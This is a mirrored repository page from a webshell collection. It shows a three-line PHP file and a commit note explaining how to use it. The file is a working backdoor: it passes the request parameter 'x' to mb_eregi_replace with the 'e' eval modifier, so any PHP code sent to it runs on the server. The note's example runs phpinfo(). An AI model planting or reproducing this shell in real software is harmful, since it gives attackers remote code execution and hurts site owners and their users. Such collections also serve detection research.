mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
ecc1fb09ee
use: shell.php?e=mb_eregi_replace post x=phpinfo();
3 lines
64 B
PHP
3 lines
64 B
PHP
<?php
|
|
mb_eregi_replace('\d', $_REQUEST['x'], '1', 'e');
|
|
?>
|